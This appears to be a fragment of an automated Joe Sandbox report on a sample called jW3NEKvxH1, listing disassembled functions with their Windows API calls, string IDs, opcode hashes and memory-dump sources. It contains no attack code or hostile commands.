                                                                                                                        • Opcode ID: 5a6a24cb308161dc37a55bbe46d27d4ed41cf5345c4cc23bfba52902118e50a4
                                                                                                                        • Instruction ID: a2293a78c91afdecbbe4238ddb046238c95aefdfe92fec70b19dc69ee3f4179f
                                                                                                                        • Opcode Fuzzy Hash: 5a6a24cb308161dc37a55bbe46d27d4ed41cf5345c4cc23bfba52902118e50a4
                                                                                                                        • Instruction Fuzzy Hash: 0471C270E042A88FDB229A2CCC88BD9BAE5EB09710F1441E5D9499B381DB758EC5CF61
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$_abort_memcmp
                                                                                                                        • String ID: C
                                                                                                                        • API String ID: 137591632-1037565863
                                                                                                                        • Opcode ID: 17903f2486249c1948a877ea9dae5677bcd3f5fa43e019d40c9c3c4da5d63b1f
                                                                                                                        • Instruction ID: 2c86b2b7aee7c6259099440b2f443d4fcd1712c4b846fc54e11f3707d9acbffa
                                                                                                                        • Opcode Fuzzy Hash: 17903f2486249c1948a877ea9dae5677bcd3f5fa43e019d40c9c3c4da5d63b1f
                                                                                                                        • Instruction Fuzzy Hash: 52B12975A01219DFDB64DF28C884BADB7B5FB08308F1145AADA49A7350EB31AE90CF54
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: 6$TCG$BG$BG
                                                                                                                        • API String ID: 176396367-2047151530
                                                                                                                        • Opcode ID: baef1e3796633e3ff9bc607151e15f371de6c66ee75f28aebb7b7bca98e70cfa
                                                                                                                        • Instruction ID: 1155ecde3ac111931631acac1ef0d494b44d3b53bdaf34537b72e7a742f9493b
                                                                                                                        • Opcode Fuzzy Hash: baef1e3796633e3ff9bc607151e15f371de6c66ee75f28aebb7b7bca98e70cfa
                                                                                                                        • Instruction Fuzzy Hash: 6B518020208381ABD646B774AC74BFE669ADF80710F60846DF68B873D1DF19DD058E7A
                                                                                                                        APIs
                                                                                                                        • GetThreadLocale.KERNEL32(00000000,02D3C08B,?,?,00000000,00000000), ref: 02D3BDF6
                                                                                                                          • Part of subcall function 02D3A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D3A7E2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$InfoThread
                                                                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                        • API String ID: 4232894706-2493093252
                                                                                                                        • Opcode ID: 0f06eeaf0f4aea1d0c802230b9a435d60cd6d05b8e28381e78e1a30dd3afd48d
                                                                                                                        • Instruction ID: dfef66d018f500eb421527b733830a90a188fa415c058d316d08cfb63e9b8bdd
                                                                                                                        • Opcode Fuzzy Hash: 0f06eeaf0f4aea1d0c802230b9a435d60cd6d05b8e28381e78e1a30dd3afd48d
                                                                                                                        • Instruction Fuzzy Hash: 45611175B101889BDB03EBA4D8A07DF77BBDB88300F509836A141AB785DA39DD05DFA1
                                                                                                                        APIs
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02D4B000
                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02D4B017
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02D4B0AB
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000002), ref: 02D4B0B7
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 02D4B0CB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Read$HandleModule
                                                                                                                        • String ID: KernelBase$LoadLibraryExA
                                                                                                                        • API String ID: 2226866862-113032527
                                                                                                                        • Opcode ID: 65896a68fb6e17c5aada0f8aef2449781cc754840cd3017843c56014e26e4649
                                                                                                                        • Instruction ID: aac1d74e28e938f67a749aedfd4e9160ab60301b4dfee79eca2df035f3557223
                                                                                                                        • Opcode Fuzzy Hash: 65896a68fb6e17c5aada0f8aef2449781cc754840cd3017843c56014e26e4649
                                                                                                                        • Instruction Fuzzy Hash: 05315071A40705BBEB20DB68CC85F6977A8EF16369F104551EA64EB3C1DB70ED40CBA4
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D34423,?,?,02DB67C8,?,?,02D5E7A8,02D365B1,02D5D30D), ref: 02D34395
                                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D34423,?,?,02DB67C8,?,?,02D5E7A8,02D365B1,02D5D30D), ref: 02D3439B
                                                                                                                        • GetStdHandle.KERNEL32(000000F5,02D343E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D34423,?,?,02DB67C8), ref: 02D343B0
                                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,02D343E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D34423,?,?), ref: 02D343B6
                                                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02D343D4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileHandleWrite$Message
                                                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                                                        • API String ID: 1570097196-2970929446
                                                                                                                        • Opcode ID: 5c1450c4769e7cf4d9650a341fdbac4cbb0755ded165b39cb45bca61eee00327
                                                                                                                        • Instruction ID: ff7de6322acb05da6a7fae33b43b68c7e1483d2a8ce887bbf06964d951636a2d
                                                                                                                        • Opcode Fuzzy Hash: 5c1450c4769e7cf4d9650a341fdbac4cbb0755ded165b39cb45bca61eee00327
                                                                                                                        • Instruction Fuzzy Hash: A7F06261EC5340F5FA13B6A0FC65F99275C8B45B11F504605B655953C2C7F88CC89B61
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                                                        • Instruction ID: 9e08aba2d6bbaca992b8505837648f657132a8ba1fc9cfba379819d2deff66f1
                                                                                                                        • Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                                                        • Instruction Fuzzy Hash: 5361F571940305AFDB20DF69C880B9ABBF9EF04724F15906AE948EB2D1D7309D82CB90
                                                                                                                        APIs
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 02DEF03B
                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 02DEF043
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 02DEF0D1
                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 02DEF0FC
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 02DEF151
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                        • String ID: csm
                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                        • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                                        • Instruction ID: 80fbbabc71c86abfdff8f63fb32be13a06971826a8e23fa4fbb1bc1dce2bb367
                                                                                                                        • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                                        • Instruction Fuzzy Hash: 9041B334A002199FCF10EF68C844B9E7BB5EF44328F148165E9166B796D731DE15CF91
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 02DC718C
                                                                                                                        • int.LIBCPMT ref: 02DC719F
                                                                                                                          • Part of subcall function 02DC4470: std::_Lockit::_Lockit.LIBCPMT ref: 02DC4481
                                                                                                                          • Part of subcall function 02DC4470: std::_Lockit::~_Lockit.LIBCPMT ref: 02DC449B
                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 02DC71DB
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 02DC7201
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02DC721D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                        • String ID: P[G
                                                                                                                        • API String ID: 2536120697-571123470
                                                                                                                        • Opcode ID: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                                                                                        • Instruction ID: 3cd141f0646dda1bd3c2d8cd79a01cda4b941331f2aad65591f3c5d093e4bfcc
                                                                                                                        • Opcode Fuzzy Hash: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                                                                                        • Instruction Fuzzy Hash: A311A231A0011AABCF04FBA4D8549EDB769DE40754F30405AE40667390EB74AF46CFA5
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                        • Instruction ID: b851ee0bb36155e4dc3238ae481e7320b34fa6b67d52685ab0300a9fbb3b3b9e
                                                                                                                        • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                        • Instruction Fuzzy Hash: 15115471581704A6D630BBB1CC49FDBF79E9F00700F40AC15B79A661E0D665FA964F50
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 02DC746F
                                                                                                                        • int.LIBCPMT ref: 02DC7482
                                                                                                                          • Part of subcall function 02DC4470: std::_Lockit::_Lockit.LIBCPMT ref: 02DC4481
                                                                                                                          • Part of subcall function 02DC4470: std::_Lockit::~_Lockit.LIBCPMT ref: 02DC449B
                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 02DC74BE
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 02DC74E4
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02DC7500
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                        • String ID: H]G
                                                                                                                        • API String ID: 2536120697-1717957184
                                                                                                                        • Opcode ID: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                                                                                        • Instruction ID: d98f7312fa8b1568b873f5d1393d136584e2432eb3dc87a9874a1b0572aa13f3
                                                                                                                        • Opcode Fuzzy Hash: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                                                                                        • Instruction Fuzzy Hash: 03114C3290451AABDF15FBA4D8549EDB77AEE40364F30405DD4066B390EB30AF06CFA1
APIs
  • Part of subcall function 02D3AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D3AD59
  • Part of subcall function 02D3AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D3AD7D
  • Part of subcall function 02D3AD3C: GetModuleFileNameA.KERNEL32(02D30000,?,00000105), ref: 02D3AD98
  • Part of subcall function 02D3AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D3AE2E
• CharToOemA.USER32(?,?), ref: 02D3AEFB
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02D3AF18
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D3AF1E
• GetStdHandle.KERNEL32(000000F4,02D3AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D3AF33
• WriteFile.KERNEL32(00000000,000000F4,02D3AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D3AF39
• LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02D3AF5B
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 02D3AF71
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
• API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
• String ID:
• API String ID: 185507032-0
• Opcode ID: 353f8da1fa9c6cc3581266e121711ec0a7c6e3c9616bd30e3c8ceed9d0defe02
• Instruction ID: 841c61651770ba858cf9ecfff2b65c973af4b270f14e98880523c64d0f3ea7e8
• Opcode Fuzzy Hash: 353f8da1fa9c6cc3581266e121711ec0a7c6e3c9616bd30e3c8ceed9d0defe02
• Instruction Fuzzy Hash: D61170F2944200BED202FBA4CC85F9B77EDEB45740F804965B784D62D0DA75ED048BB6
APIs
• __allrem.LIBCMT ref: 02DF0D19
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DF0D35
• __allrem.LIBCMT ref: 02DF0D4C
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DF0D6A
• __allrem.LIBCMT ref: 02DF0D81
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DF0D9F
Memory Dump Source
• Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: 2e4d297f402c8918b91ec823193bf3dc59bf70e37f00d95da226e179a692f1e4
• Instruction ID: 994a50a201f95eb58411eb36d8f9308eba11d1cf0f40db0de67a1a2190bd6daf
• Opcode Fuzzy Hash: 2e4d297f402c8918b91ec823193bf3dc59bf70e37f00d95da226e179a692f1e4
• Instruction Fuzzy Hash: 37813B72A007069BD7649B78CC40B6AB3E9EF40729F26812AE615D77C5E771ED00CB98
APIs
Memory Dump Source
• Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 4118d0c7a5faff20c3bdd9400e50d9846731c96832acf5071bf3a173b9413d13
• Instruction ID: 6b5a89fbcf00acb0f70088e31cb10c6b63fddf7a2deb9571a7e23a1c99468d08
• Opcode Fuzzy Hash: 4118d0c7a5faff20c3bdd9400e50d9846731c96832acf5071bf3a173b9413d13
• Instruction Fuzzy Hash: F951B0369042106FDB649F68D8807BAB7A9DF45364F37415AEF4D9B380EB329D01C7A8
APIs
Memory Dump Source
• Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
• Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
• Instruction ID: d7c20ff6c9293404e403b1cb934c22cd9630f9a6b2fe999b32bb77c2e2895b3f
• Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
• Instruction Fuzzy Hash: 07513232910209ABDBA4DB588C40FAD77A9DF49724F16421BEA19963D1DB31CD20CA7C
APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02D3E625
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02D3E641
• SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02D3E67A
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02D3E6F7
• SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02D3E710
• VariantCopy.OLEAUT32(?,00000000), ref: 02D3E745
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
• API ID: ArraySafe$BoundIndex$CopyCreateVariant
• String ID:
• API String ID: 351091851-0
• Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
• Instruction ID: 3fe41909586222387b3cdc787ab1a36d4409f8e509d375529551ae4639ff71f2
• Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
• Instruction Fuzzy Hash: 6B51E87690122D9BCB23DB58C980BD9B3BDEF49300F0045E5EA48E7352DA70AF858F61
APIs
